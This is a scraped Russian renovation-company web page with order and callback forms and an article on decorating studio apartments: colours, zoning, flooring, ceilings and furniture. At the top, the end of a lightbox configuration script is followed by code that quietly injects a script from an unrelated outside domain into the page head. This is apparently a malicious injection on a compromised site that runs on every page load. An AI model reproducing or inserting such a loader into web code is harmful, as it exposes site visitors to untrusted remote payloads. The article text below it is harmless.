, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); } var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Заказать услуги онлайн




Заполните форму ниже, чтоби оставить заявку на наши услуги или продукцию. Наши специалисты обязательно свяжутся с Вами в ближайшее время!

Поля, помеченные *,обязательны для заполнения


Имя

заказ  

телефон*

Перезвонить Вам?




Закажите БЕСПЛАТНЫЙ обратный звонок нашего специалиста, и он обязательно свяжется с Вами в ближайшее время

Поля, помеченные *, обязательны для заполнения

Ваше имя

Номер телефона*

(812) 372-67-66

Москва

(495) 638-52-50

Санкт-Петербург

(812) 372-67-66


Квартира-студия: основные приемы в отделке

Квартиры-студии — современная тенденция на рынке жилья. Квартиры такого типа отличаются тем, что в них отсутствуют отдельные комнаты, за исключением санузла — есть лишь общее пространство, которое можно распределять на функциональные зоны по усмотрению хозяина.

У многих россиян квартира-студия ассоциируется с ограниченным пространством — действительно, жилье такого типа в большинстве случаев является весьма компактным. Однако даже этот недостаток можно компенсировать грамотно продуманной планировкой и отделкой.

Оформляя квартиру-студию, лучше всего выбрать для всего интерьера общий цвет, который и будет задавать тон всей обстановке. Это может быть серый, фисташковый, шоколадный, голубой или любой другой, имеющий большое количество оттенков.

Для визуального зонирования можно создать плавный переход между ними. Лучше, чтобы в интерьере преобладали светлые прохладные тона — так пространство будет визуально больше. Желательно не использовать крупных, массивных узоров для декора помещения, поскольку они будут перегружать и без того небольшое пространство. Яркие элементы помогут расставить акценты и также сыграют роль в зонировании помещения.

Выбор отделочных материалов для квартиры-студии

Выбирая отделочные материалы, следует в первую очередь отталкиваться от их функциональности и той роли, которую вы на них возлагаете. Так, для стен может использоваться декоративная штукатурка, краска, обои. Напольное покрытие также может быть любым, следует только учесть его функциональные особенности.

Одна из основных проблем квартиры-студии — отсутствие капитальных перегородок, которые гасят звуки, поэтому желательно, чтобы напольное покрытие было максимально «тихим». Его можно также использовать для зонирования помещения. Так, постелив ковролин в зоне отдыха, вы зрительно отделите ее от остальных и сделаете более уютной.

Выбирая материал для отделки потолка, следует помнить, что он играет не только декоративную, но и функциональную роль — отражает и рассеивает свет. Лучше, чтобы потолок был светлого оттенка. Для небольшой квартиры подойдет глянцевый натяжной потолок, который отлично отражает свет.

В квартире-студии должны отсутствовать массивные и визуально тяжелые элементы обстановки и декора. Для ее оформления лучше выбрать подвесные шкафы или тумбы на ножках, небольшие пуфы вместо массивных кресел, штору из бус вместо более тяжелых драпировок. Это сделает интерьер более воздушным и легким.